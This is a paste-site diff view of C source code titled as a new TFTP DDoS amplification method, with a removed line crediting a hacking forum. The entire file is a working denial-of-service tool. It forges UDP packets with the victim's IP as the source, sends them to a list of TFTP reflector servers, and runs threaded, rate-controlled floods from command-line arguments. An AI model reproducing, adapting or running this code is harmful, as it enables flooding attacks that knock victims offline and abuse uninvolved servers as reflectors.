SHOW:
|
|
- or go back to the newest paste.
1 | /* NEW TFTP DDoS AMPLIFICATION METHOD. */ | |
2 | - | /* Greetz: HackForums.net */ |
2 | + | |
3 | - | |
3 | + | |
4 | #include <unistd.h> | |
5 | #include <stdio.h> | |
6 | #include <stdlib.h> | |
7 | #include <string.h> | |
8 | #include <sys/socket.h> | |
9 | #include <netinet/ip.h> | |
10 | #include <netinet/udp.h> | |
11 | #include <arpa/inet.h> | |
12 | #define MAX_PACKET_SIZE 8192 | |
13 | #define PHI 0x9e3779b9 | |
14 | static uint32_t Q[4096], c = 362436; | |
15 | struct list | |
16 | { | |
17 | struct sockaddr_in data; | |
18 | struct list *next; | |
19 | struct list *prev; | |
20 | }; | |
21 | struct list *head; | |
22 | volatile int tehport; | |
23 | volatile int limiter; | |
24 | volatile unsigned int pps; | |
25 | volatile unsigned int sleeptime = 100; | |
26 | struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; }; | |
27 | void init_rand(uint32_t x) | |
28 | { | |
29 | int i; | |
30 | Q[0] = x; | |
31 | Q[1] = x + PHI; | |
32 | Q[2] = x + PHI + PHI; | |
33 | for (i = 3; i < 4096; i++) | |
34 | { | |
35 | Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; | |
36 | } | |
37 | } | |
38 | uint32_t rand_cmwc(void) | |
39 | { | |
40 | uint64_t t, a = 18782LL; | |
41 | static uint32_t i = 4095; | |
42 | uint32_t x, r = 0xfffffffe; | |
43 | i = (i + 1) & 4095; | |
44 | t = a * Q[i] + c; | |
45 | c = (t >> 32); | |
46 | x = t + c; | |
47 | if (x < c) { | |
48 | x++; | |
49 | c++; | |
50 | } | |
51 | return (Q[i] = r - x); | |
52 | } | |
53 | unsigned short csum (unsigned short *buf, int nwords) | |
54 | { | |
55 | unsigned long sum = 0; | |
56 | for (sum = 0; nwords > 0; nwords--) | |
57 | sum += *buf++; | |
58 | sum = (sum >> 16) + (sum & 0xffff); | |
59 | sum += (sum >> 16); | |
60 | return (unsigned short)(~sum); | |
61 | } | |
62 | void setup_ip_header(struct iphdr *iph) | |
63 | { | |
64 | iph->ihl = 5; | |
65 | iph->version = 4; | |
66 | iph->tos = 0; | |
67 | iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14; | |
68 | iph->id = htonl(54321); | |
69 | iph->frag_off = 0; | |
70 | iph->ttl = MAXTTL; | |
71 | iph->protocol = IPPROTO_UDP; | |
72 | iph->check = 0; | |
73 | iph->saddr = inet_addr("192.168.3.100"); | |
74 | } | |
75 | void setup_udp_header(struct udphdr *udph) | |
76 | { | |
77 | udph->source = htons(5678); | |
78 | udph->dest = htons(69); | |
79 | udph->check = 0; | |
80 | memcpy((void *)udph + sizeof(struct udphdr), "\x00\x01\x2f\x78\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00", 14); | |
81 | udph->len=htons(sizeof(struct udphdr) + 14); | |
82 | } | |
83 | void *flood(void *par1) | |
84 | { | |
85 | struct thread_data *td = (struct thread_data *)par1; | |
86 | char datagram[MAX_PACKET_SIZE]; | |
87 | struct iphdr *iph = (struct iphdr *)datagram; | |
88 | struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr); | |
89 | struct sockaddr_in sin = td->sin; | |
90 | struct list *list_node = td->list_node; | |
91 | int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); | |
92 | if(s < 0){ | |
93 | fprintf(stderr, "Could not open raw socket.\n"); | |
94 | exit(-1); | |
95 | } | |
96 | init_rand(time(NULL)); | |
97 | memset(datagram, 0, MAX_PACKET_SIZE); | |
98 | setup_ip_header(iph); | |
99 | setup_udp_header(udph); | |
100 | udph->source = htons(rand() % 65535 - 1026); | |
101 | iph->saddr = sin.sin_addr.s_addr; | |
102 | iph->daddr = list_node->data.sin_addr.s_addr; | |
103 | iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); | |
104 | int tmp = 1; | |
105 | const int *val = &tmp; | |
106 | if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ | |
107 | fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); | |
108 | exit(-1); | |
109 | } | |
110 | init_rand(time(NULL)); | |
111 | register unsigned int i; | |
112 | i = 0; | |
113 | while(1){ | |
114 | sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data)); | |
115 | list_node = list_node->next; | |
116 | iph->daddr = list_node->data.sin_addr.s_addr; | |
117 | iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); | |
118 | iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); | |
119 | ||
120 | pps++; | |
121 | if(i >= limiter) | |
122 | { | |
123 | i = 0; | |
124 | usleep(sleeptime); | |
125 | } | |
126 | i++; | |
127 | } | |
128 | } | |
129 | int main(int argc, char *argv[ ]) | |
130 | { | |
131 | if(argc < 6){ | |
132 | fprintf(stderr, "Invalid parameters!\n"); | |
133 | fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]); | |
134 | exit(-1); | |
135 | } | |
136 | srand(time(NULL)); | |
137 | int i = 0; | |
138 | head = NULL; | |
139 | fprintf(stdout, "Setting up sockets...\n"); | |
140 | int max_len = 128; | |
141 | char *buffer = (char *) malloc(max_len); | |
142 | buffer = memset(buffer, 0x00, max_len); | |
143 | int num_threads = atoi(argv[4]); | |
144 | int maxpps = atoi(argv[5]); | |
145 | limiter = 0; | |
146 | pps = 0; | |
147 | int multiplier = 20; | |
148 | FILE *list_fd = fopen(argv[3], "r"); | |
149 | while (fgets(buffer, max_len, list_fd) != NULL) { | |
150 | if ((buffer[strlen(buffer) - 1] == '\n') || | |
151 | (buffer[strlen(buffer) - 1] == '\r')) { | |
152 | buffer[strlen(buffer) - 1] = 0x00; | |
153 | if(head == NULL) | |
154 | { | |
155 | head = (struct list *)malloc(sizeof(struct list)); | |
156 | bzero(&head->data, sizeof(head->data)); | |
157 | head->data.sin_addr.s_addr=inet_addr(buffer); | |
158 | head->next = head; | |
159 | head->prev = head; | |
160 | } else { | |
161 | struct list *new_node = (struct list *)malloc(sizeof(struct list)); | |
162 | memset(new_node, 0x00, sizeof(struct list)); | |
163 | new_node->data.sin_addr.s_addr=inet_addr(buffer); | |
164 | new_node->prev = head; | |
165 | new_node->next = head->next; | |
166 | head->next = new_node; | |
167 | } | |
168 | i++; | |
169 | } else { | |
170 | continue; | |
171 | } | |
172 | } | |
173 | struct list *current = head->next; | |
174 | pthread_t thread[num_threads]; | |
175 | struct sockaddr_in sin; | |
176 | sin.sin_family = AF_INET; | |
177 | sin.sin_addr.s_addr = inet_addr(argv[1]); | |
178 | struct thread_data td[num_threads]; | |
179 | for(i = 0;i<num_threads;i++){ | |
180 | td[i].thread_id = i; | |
181 | td[i].sin= sin; | |
182 | td[i].list_node = current; | |
183 | pthread_create( &thread[i], NULL, &flood, (void *) &td[i]); | |
184 | } | |
185 | fprintf(stdout, "Starting flood...\n"); | |
186 | for(i = 0;i<(atoi(argv[6])*multiplier);i++) | |
187 | { | |
188 | usleep((1000/multiplier)*1000); | |
189 | if((pps*multiplier) > maxpps) | |
190 | { | |
191 | if(1 > limiter) | |
192 | { | |
193 | sleeptime+=100; | |
194 | } else { | |
195 | limiter--; | |
196 | } | |
197 | } else { | |
198 | limiter++; | |
199 | if(sleeptime > 25) | |
200 | { | |
201 | sleeptime-=25; | |
202 | } else { | |
203 | sleeptime = 0; | |
204 | } | |
205 | } | |
206 | pps = 0; | |
207 | } | |
208 | return 0; | |
209 | } |